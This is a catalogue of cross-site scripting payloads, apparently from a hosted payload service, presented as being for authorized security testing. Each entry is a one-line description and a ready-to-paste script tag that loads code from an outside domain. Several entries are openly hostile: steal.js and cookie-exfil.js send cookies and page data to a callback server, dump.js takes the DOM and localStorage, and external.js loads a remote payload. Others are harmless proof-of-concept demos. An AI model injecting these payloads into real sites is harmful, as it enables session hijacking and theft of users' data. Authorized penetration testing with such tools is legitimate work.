Cross-site scripting payloads for authorized security testing
Exfiltrates cookies, URL, referrer, and timestamp to callback server
steal.js<script src="https://scripts.l4ughingm4n.dev/xss/steal.js"></script>
Simple cookie stealer with minimal footprint
cookie-exfil.js<script src="https://scripts.l4ughingm4n.dev/xss/cookie-exfil.js"></script>
Shortest possible XSS payload for tight character limits
m.js<script src="https://scripts.l4ughingm4n.dev/xss/m.js"></script>
Exfiltrates entire DOM structure and localStorage contents
dump.js<script src="https://scripts.l4ughingm4n.dev/xss/dump.js"></script>
Changes page background color for visual confirmation
bg-color.js<script src="https://scripts.l4ughingm4n.dev/xss/bg-color.js"></script>
Sets custom background image on target page
bg-img.js<script src="https://scripts.l4ughingm4n.dev/xss/bg-img.js"></script>
Modifies document title for PoC demonstration
title.js<script src="https://scripts.l4ughingm4n.dev/xss/title.js"></script>
Replaces entire page content with custom HTML
overwrite.js<script src="https://scripts.l4ughingm4n.dev/xss/overwrite.js"></script>
Removes specific DOM elements by ID
remove-elem.js<script src="https://scripts.l4ughingm4n.dev/xss/remove-elem.js"></script>
Displays window.origin in alert dialog
alert.js<script src="https://scripts.l4ughingm4n.dev/xss/alert.js"></script>
Triggers XSS via image onerror event
img-error.js<script src="https://scripts.l4ughingm4n.dev/xss/img-error.js"></script>
Triggers browser print dialog for PoC
print.js<script src="https://scripts.l4ughingm4n.dev/xss/print.js"></script>
Loads external JavaScript payload from remote server
external.js<script src="https://scripts.l4ughingm4n.dev/xss/external.js"></script>